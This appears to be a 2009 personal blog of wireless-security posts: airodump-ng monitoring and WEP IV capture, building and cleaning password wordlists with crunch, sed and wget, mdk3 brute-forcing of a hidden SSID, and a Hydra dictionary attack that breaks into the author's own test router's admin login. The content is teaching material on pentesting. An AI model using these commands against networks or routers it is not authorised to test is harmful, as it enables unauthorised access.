Sunday, 17 May 2009

Using airodump-ng to monitor wireless networks

When checking wireless networks, one of the first things I use is airodump.

Kismet is also a fantastic tool, however I find that airodump is good for finding info quickly, and you can apply filters to narrow down your search easily.
Kismet on the other hand can give other information such as IP ranges and hidden SSIDs (given enough time), and can also function as an IDS, so it all depends on what you want to do / what you need.

In my case I am using an Asus Eee PC with an Atheros wireless interface and am using trusty ol' BackTrack 3 Final on a live USB.
My test setup is a router with a hidden SSID and 128-bit WEP encryption.

The Atheros chipset (madwifi driver) has a so-called master interface and virtual access points or VAPs.
What we do is use the master interface (in this case wifi0) to create virtual interfaces.

The first action to take is to check what wireless interfaces are up and to put your wireless card into monitor mode.

Open up a terminal and do the below ;


airmon-ng start wifi0

Now I have 2 working VAPs,
ath0 & ath1

ath0 is in managed mode
ath1 is in monitor mode

Now our card is in monitor mode (this can be checked by doing an iwconfig).

iwconfig ath1

To start airodump, simply type in the terminal

airodump-ng ath1

airodump will run without any filters, showing all networks within range.
Some access points / routers are set to send beacons at a lower rate than normal; with the channels hopping as quickly as they do in standard mode, it can take a while for airodump to find such an AP.
We can slow the channel hopping down with the -f option (time in milliseconds between hops);
To keep results on the display for longer you can adjust the time limit with the --berlin option (seconds before an AP or client that has gone quiet is dropped from the display; the default is 120).
With the command below airodump will only change channels every 2000 milliseconds (2 seconds) and keep results on the display for 600 seconds.

airodump-ng ath1 -f 2000 --berlin 600

If you are looking specifically for an open network or a WEP network, you can filter the results by encryption type with the -t option (it can be given more than once), and to only list clients which are connected to networks, apply the -a filter.

airodump-ng ath1 -f 2000 --berlin 600 -t OPN -t WEP -a

(hard to believe people actually still use WEP ! but they do..)

Now to limit the results to the test network, we filter it down to show only my test network using the --bssid option. The other filter options can be removed as we will be limiting the view to a single access point only.
Best to also lock the channel to the one the test network is using with the -c option; airodump then stops hopping and misses nothing from that AP.

airodump-ng ath1 -a -c 2 --bssid 00:13:D4:09:32:60

To write all packets to a file we add the -w option (the argument is a file prefix, so test becomes test-01.cap); this captures all the data packets from the access point, which can be used (when enough packets have been captured) to crack the WEP key with aircrack-ng.
airodump-ng ath1 -a -c 2 --bssid 00:13:D4:09:32:60 -w test

To save only the captured IVs (a much smaller file, and all that is needed for a WEP crack, provided you have enough of them!) add the --ivs option.
airodump-ng ath1 -a -c 2 --bssid 00:13:D4:09:32:60 -w test --ivs

If you want airodump to hop between specific channels only (for instance channels 4, 7 & 11), these can also be given to the -c option as a comma-separated list;
airodump-ng ath1 -c 4,7,11

Video showing the above;

Information on airodump-ng can be found here.
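The display filters above only work live, but airodump-ng also writes the same information next to the capture when -w is used (test-01.csv for the -w test example). As an added example that is not part of the original post, the shell functions below apply a -t style encryption filter to such a CSV and read the # IV counter airodump-ng keeps per AP, which is what decides when a WEP crack is worth attempting. The CSV is constructed for this example: the column layout follows the AP table airodump-ng writes, the 00:13:D4:09:32:60 row mirrors the test AP above, and the other rows are made up.

```shell
#!/bin/sh
# Added example: filter a saved airodump-ng CSV by encryption type and read the IV
# counter, without re-running airodump-ng. The CSV below is CONSTRUCTED for this
# example; its header follows the AP section airodump-ng writes to <prefix>-01.csv.
SAMPLE_CSV=$(mktemp)
trap 'rm -f "$SAMPLE_CSV"' EXIT
cat > "$SAMPLE_CSV" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:13:D4:09:32:60, 2009-05-17 10:01:02, 2009-05-17 10:05:30,  2,  54, WEP, WEP, , -45, 120, 312,   0.  0.  0.  0,   4, TEST,
00:11:22:33:44:55, 2009-05-17 10:01:05, 2009-05-17 10:05:29,  6,  54, OPN, , , -70,  80,   0,   0.  0.  0.  0,   8, FreeWifi,
AA:BB:CC:DD:EE:FF, 2009-05-17 10:01:09, 2009-05-17 10:05:28, 11,  54, WPA2 WPA, CCMP TKIP, PSK, -60, 200,   0,   0.  0.  0.  0,   0, ,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:1A:2B:3C:4D:5E, 2009-05-17 10:02:00, 2009-05-17 10:05:30, -50, 40, 00:13:D4:09:32:60, TEST
EOF

# list_aps FILE KEYWORD...: print "BSSID channel privacy ESSID" for every AP whose
# Privacy column contains one of the keywords (OPN, WEP, WPA, WPA2, ...), i.e. the
# offline equivalent of "-t OPN -t WEP". An empty ESSID is a hidden SSID.
list_aps() {
  file=$1; shift
  awk -F',' -v wanted=" $* " '
    function trim(s) { gsub(/^[ \t]+|[ \t]+$/, "", s); return s }
    /^Station MAC/ { exit }                 # the client table starts here
    /^BSSID/ || NF < 15 { next }            # header line and blank lines
    {
      n = split(trim($6), priv, " ")        # "WPA2 WPA" -> two tokens
      for (i = 1; i <= n; i++)
        if (index(wanted, " " priv[i] " ")) {
          essid = trim($14); if (essid == "") essid = "<hidden>"
          print trim($1), $4 + 0, trim($6), essid
          break
        }
    }' "$file"
}

# ivs_for FILE BSSID: the "# IV" counter airodump-ng keeps for one AP (0 if absent)
ivs_for() {
  awk -F',' -v b="$2" '
    $1 == b { print $11 + 0; found = 1; exit }
    END { if (!found) print 0 }' "$1"
}

list_aps "$SAMPLE_CSV" OPN WEP      # the two networks the -t OPN -t WEP view would show
printf 'IVs captured for the test AP: %s\n' "$(ivs_for "$SAMPLE_CSV" 00:13:D4:09:32:60)"
```

The ESSID column is read as a single field, so an SSID that itself contains a comma would be truncated; airodump-ng's CSV has no quoting, so for such networks the ESSID has to be pieced back together from fields 14 onwards.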

Monday, 11 May 2009

Wordlists and Wordlist manipulation - Part 2

A revisited wordlist post can be found here;

Some tools for creating / editing wordlists;

Crunch is a pretty easy yet powerful dictionary generator; general usage is;
/pentest/password/crunch [min length] [max length] [charset] > filename.txt

If you want a 4 character password list with just numbers, the command is;
/pentest/password/crunch 4 4 0123456789 > pass1.txt
If you want a 6 character password list with lowercase letters and numbers, the command is;
/pentest/password/crunch 6 6 abcdefghijklmnopqrstuvwxyz0123456789 > pass2.txt

You can also fix parts of the passwords; if for instance you think the password will always start with "pass" followed by four numbers, you can use crunch's -t option to do the work for you (each @ in the pattern is replaced by one character of the charset).
/pentest/password/crunch 8 8 0123456789 -t pass@@@@ > password.txt

That still results in a file with 10000 possible combinations though.. you can check the number of lines with;
cat password.txt | wc -l

The syntax for crunch gets slightly more complicated when dealing with special characters.
If for instance you wanted to make a five character wordlist with all possible special characters, you would need to 'escape' certain special characters from the shell using a backslash \

If you wanted to fix certain characters using the -t option, then again you would need to escape certain characters, ie;

/pentest/password/crunch 5 5 "\`\~\!@#$%^&*()-_=+[{]};:'\"\|,<.>/?" -t "@@\"\\@"
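To see exactly what a -t pattern expands to before letting crunch write a large file, here is an added example (not from the original post, and not crunch itself): a small awk pattern expander in which, as in the crunch examples above, every @ in the pattern is replaced by one character of the given charset and everything else is kept literally. The count function gives the file size up front; for the pass@@@@ example it confirms the 10000 lines mentioned above.

```shell
#!/bin/sh
# Added example: reproduce what "crunch <n> <n> <charset> -t <pattern>" expands to,
# in plain awk, so a mask can be previewed and counted before crunch writes it out.
# Only the '@' placeholder is implemented (every '@' is replaced by one character
# of CHARSET); all other characters of PATTERN are emitted literally.
# Note: awk -v processes backslash escapes, so patterns containing '\' need doubling.

# expand_pattern PATTERN CHARSET: the full list, one candidate per line
expand_pattern() {
  awk -v pat="$1" -v cs="$2" '
    function rec(i, prefix,   j, c) {
      if (i > length(pat)) { print prefix; return }   # pattern consumed: emit
      c = substr(pat, i, 1)
      if (c != "@") { rec(i + 1, prefix c); return }  # literal character
      for (j = 1; j <= length(cs); j++)               # one branch per charset char
        rec(i + 1, prefix substr(cs, j, 1))
    }
    BEGIN { rec(1, "") }'
}

# count_pattern PATTERN CHARSET: size of the list without generating it
# (charset length raised to the number of '@' placeholders)
count_pattern() {
  awk -v pat="$1" -v cs="$2" 'BEGIN { n = gsub(/@/, "", pat); print length(cs) ^ n }'
}

expand_pattern 'pass@@@@' 0123456789 | head -n 3     # pass0000, pass0001, pass0002
count_pattern  'pass@@@@' 0123456789                 # 10000
```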

Using SED

Sed is short for stream editor, and although extremely powerful, it is not easy to use and definitely too complicated for me.. So herewith just an example;

You can copy the contents of a webpage with a simple 'select all' and 'copy', paste this into a text file and save it (web.txt);

Transform every space into a new line (GNU sed understands \n in the replacement);
sed 's/[[:space:]]/\n/g' -i web.txt

Remove empty lines;
sed '/^$/d' -i web.txt

Then sort alphabetically and exclude duplicates;
cat web.txt | sort | uniq > web_sorted_uniq.txt

So with just a Ctrl + A, Copy & Paste and 3 lines of code you have a wordlist of all words on a specific webpage.
Obviously some websites are better suited for this than others, however it is still a quick and dirty way to get a decently focused wordlist, and you can then clean it up further with sed commands and pw-inspector (see lower down in the post).

To remove any periods from the front of the words;
sed 's/^[.]//' -i web.txt

To remove any comma from the end of the words;
sed 's/[,]$//' -i web.txt

Appending characters to each word in wordlist (such as '123');
sed 's/$/123/' wordlist.txt > wordlist123.txt

To delete lines in the file containing a certain character (here "?");
sed '/?/ d' -i wordlist.txt

or to create a new file with those changes;
sed '/?/ d' wordlist.txt > wordlist1.txt

Some good information on SED usage can be found here.

The 'tr' command is handy as well, for instance to change upper to lower case or vice versa;
tr '[:upper:]' '[:lower:]' < wordlist.txt > wordlist_lower.txt

Information can be found here.

Using Wget & Wyd

This is a much more refined way of getting words from a website, even going down several layers in the website.

First we make a folder and move to it;
mkdir ~/tr
cd ~/tr

Then we start wget to grab everything from the site, specifying how deep we want to go (-l 1 = follow links one level down) and -nd so that the files land in the current folder instead of a copy of the site's directory tree; the site URL goes at the end of the command;
wget -r -l 1 -nd

Then we go to wyd and use it to extract all words from the downloaded files;
cd /pentest/password/wyd
perl wyd.pl -n -o ~/wordlistTR.txt ~/tr/

Head back to the home directory;
cd ~/
cat wordlistTR.txt | sort | uniq > TR_sorted_uniq.txt

So now we have a text file with all words from the first level of the site, in alphabetical order, without duplicates.

It's handy to remember that the 'sort' command (in the C locale) sorts in the order defined by the ASCII table and so gives ABCabc instead of AaBbCc.
To get a case-insensitive alphabetical order, use the -f option;

cat wordlistTR.txt | sort -f | uniq > TR_sorted_uniq.txt

Password Inspector
You can use pw-inspector (which ships with Hydra) to tidy up wordlist files based on minimum and maximum password length and which character sets a password must contain.

cat TR_sorted_uniq.txt | pw-inspector -m 4 -M 15 > TR_optimised.txt
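The 'paste the webpage into web.txt' steps from the SED section and the sort -f / pw-inspector clean-up above, combined into one pipeline as an added example (not from the original post). It goes slightly beyond the individual commands above: a run of whitespace becomes a single line break (tr instead of the GNU-only sed \n), trailing punctuation of any kind is stripped rather than only a comma, and the length filter is done with awk so the pipeline works where pw-inspector is not installed. The page text is constructed for this example.

```shell
#!/bin/sh
# Added example: the "select all, paste into web.txt" wordlist pipeline from the
# SED section, followed by the sort -f / length-filter clean-up, as one function.
# The page text below is CONSTRUCTED for this example.
SAMPLE_PAGE=$(mktemp)
trap 'rm -f "$SAMPLE_PAGE"' EXIT
cat > "$SAMPLE_PAGE" <<'EOF'
Welcome to the Router Admin page.
Default login: admin, password: admin1234

Please change it, then reboot the router.
EOF

# web_to_wordlist FILE MIN MAX: one candidate per line, punctuation trimmed,
# case-insensitively sorted, deduplicated, and kept only if MIN <= length <= MAX.
web_to_wordlist() {
  tr -s '[:space:]' '\n' < "$1" |             # every run of whitespace -> one line break
    sed -e 's/^[.]//' -e 's/[.,:;!?]*$//' |   # leading period, trailing punctuation
    sed '/^$/d' |                             # drop empty lines
    LC_ALL=C sort -f | uniq |                 # AaBbCc order, exact duplicates removed
    awk -v min="$2" -v max="$3" 'length($0) >= min && length($0) <= max'   # pw-inspector -m/-M
}

web_to_wordlist "$SAMPLE_PAGE" 4 15
```

Because uniq only collapses exact duplicates, "Admin" and "admin" both survive; that is usually what you want for a login attack, since the target may be case-sensitive.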

So the above shows some ways to get wordlists and how to manipulate them to your liking!

Wordlists and Wordlist manipulation - Part 1

A crucial part of checking PC / Network security is having decent sets of wordlists.

There are a lot out there on the net, however many are not really worth much and some need a lot of work to make them usable.
Larger wordlists do not always mean better.

For checking router logins and passwords, it is always worth your while to first run through the maker's default logins & passwords.
How do you figure out the make of the router? Well, two options have worked for me;

When running Kismet, it will on occasion be able to show the manufacturer of the wireless router.

Open up Kismet (from shell)
Sort by BSSID (type 's' followed by 'b')
"s" --> "b"
Select the network of interest and hit 'enter' to see more details on the network.
If you are in luck the Manufacturer will be shown.

An alternative is to look up the manufacturer based on the BSSID (the AP's MAC address): its first three octets are the OUI, which is assigned to the vendor.

Get the BSSID mac by using either 'airodump' or Kismet.

Then;
The website ; will allow a lookup of MAC addresses and show you the manufacturer.

You can then check the default login / passwords on either;
[if you speak a bit of french ;) ]
This should be your first check before trying time-consuming brute-forcing with Hydra or Medusa.
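The manufacturer lookup can also be done offline against the IEEE OUI list (the online lookup sites use the same registry). As an added example that is not part of the original post, the shell function below extracts the OUI (first three octets) from a BSSID and looks it up in a local oui.txt; the table here is a constructed five-line excerpt in the oui.txt line format (the prefixes listed are real IEEE assignments, but a real lookup needs the full file, and the test AP's prefix 00:13:D4 is deliberately not in it). It also flags locally administered addresses, for which an OUI lookup is meaningless.

```shell
#!/bin/sh
# Added example: vendor lookup from a BSSID's OUI (first three octets) against a
# local copy of the IEEE oui.txt, so no website is needed. The table below is a
# CONSTRUCTED excerpt in the oui.txt "XX-XX-XX   (hex)  Vendor" line format; the
# prefixes listed are real assignments, but use the full IEEE file in practice.
OUI_TABLE=$(mktemp)
trap 'rm -f "$OUI_TABLE"' EXIT
cat > "$OUI_TABLE" <<'EOF'
00-50-56   (hex)		VMware, Inc.
00-0C-29   (hex)		VMware, Inc.
00-50-F2   (hex)		MICROSOFT CORP.
00-16-3E   (hex)		Xensource, Inc.
B8-27-EB   (hex)		Raspberry Pi Foundation
EOF

# oui_lookup MAC [TABLE]: vendor for MAC, accepting 00:50:56:.. or 00-50-56-.. in any case
oui_lookup() {
  prefix=$(printf '%s' "$1" | tr 'abcdef:' 'ABCDEF-' | cut -c1-8)   # e.g. 00-50-56
  # Bit 1 of the first octet set (second hex digit 2,3,6,7,A,B,E,F) marks a locally
  # administered address (randomised or cloned MAC): the OUI then says nothing
  # about the hardware vendor.
  case $(printf '%s' "$prefix" | cut -c2) in
    [2367ABEF]) echo "locally administered address, vendor lookup not meaningful"; return 0 ;;
  esac
  vendor=$(awk -v p="$prefix" '
    $1 == p && $2 == "(hex)" { sub(/^.*\(hex\)[ \t]*/, ""); print; exit }' "${2:-$OUI_TABLE}")
  printf '%s\n' "${vendor:-unknown (not in table)}"
}

oui_lookup 00:50:56:aa:bb:cc      # VMware, Inc.
oui_lookup 00:13:D4:09:32:60      # the test AP from the posts above; not in this excerpt
```

With the full oui.txt the same function answers for any BSSID; a "locally administered" result on an access point is itself a hint that the MAC has been changed.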

As shown in previous posts, mdk3 can be used to crack hidden SSIDs. A brute-force option is available but in reality takes a long time for SSIDs of over 3 or 4 characters.
It takes around 35 min to try all printable characters for a 3-character SSID on my test setup.

Having a good wordlist is much better, however if the ESSID is not in the wordlist.. you're out of luck.

There is a custom SSID wordlist based on the Shmoo Group's SSID list for WPA tables, which can be found here;

For instance, I have taken that list and added new SSIDs which I see when out and about with my trusty old PDA running WiFiFoFum.
(Now running at over 4000 SSIDs seen to be in use)

Plenty of wordlists can also be found on;

Church of Wifi WPA tables

And of course ...
Google is your friend :)

But what if you want to create a custom made wordlist for a specific job / test ?

I'll try to elaborate a bit more on that in part 2..

Using Hydra after connecting to network

After gaining access to your network, you can check the strength of your router's admin password by using a tool called Hydra from THC.
Hydra is a login / password brute-force tool which works through login and password lists (dictionary files).

First we find our network and do what is needed to log in
In this case my test setup is;
* Eee PC 900, using the built in Atheros wireless.
* Open network with hidden SSID on channel 3, no clients attached, no mac filtering enabled.

airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0 -f 1500 -t OPN -a
(using the -f option to slow down the channel hopping and the -t option to show only open networks)

After finding the network and relevant info with airodump, I'll use my custom ssid wordlist to crack the hidden ssid ;
mdk3 ath0 p -c 2 -t 00:13:D4:09:32:60 -f /mnt/sda1/ssid.txt -s 50
Depending on how often the AP sends beacons it can take a while to start; it will also show other networks broadcasting.

So now we have all the info we need to connect to this open network.
We start by stopping the wireless interface, which is still in monitor mode, recreate it in managed (station) mode, then enter the information we have acquired to join the network and check for success;

airmon-ng stop ath0
wlanconfig ath0 create wlandev wifi0 wlanmode sta
iwconfig ath0 channel 2 essid TEST ap 00:13:D4:09:32:60
ifconfig ath0 up
iwconfig ath0

Success ! (see link quality? we have a connection!)

Now to see whether the AP has DHCP enabled so we can automatically get an IP address, using dhcpcd with the -t option to set a time limit and -d to print some extra info on our MAC and the IP address we are given.
When successful we can do a netstat to see which IP address the router is using (the default gateway);

dhcpcd -t 30 -d ath0
netstat -nr

So now we know the router's IP address, let's try to log in using some standard password combinations..

No luck..

OK, so now we will attempt to use Hydra.
Note the address line in the browser; that path is what the http-get module is pointed at.
I have wordlists stored on my sda1 drive which have been prepared using a combination of default passwords and regularly used ones.

hydra -L /mnt/sda1/login.txt -P /mnt/sda1/password.txt -t 2 -e ns -f http-get /index.asp
(-L and -P are the login and password lists, -t 2 keeps it to two parallel connections so a small router is not flooded, -e ns additionally tries an empty password (n) and the login name as password (s), -f stops at the first working pair, and http-get /index.asp is the module plus the path to request; the router's IP address goes in front of the module name.)
This can take a while, and so to speed things up I tweaked my custom wordlist a bit.

Success !

So now using the above found working login and password, we try to login again;

We're in !

So now we are in the router and can make changes as we see fit!
And make sure the security is increased..

Here is a video showing going from cracking a hidden ssid, cracking WEP encryption and hacking the router;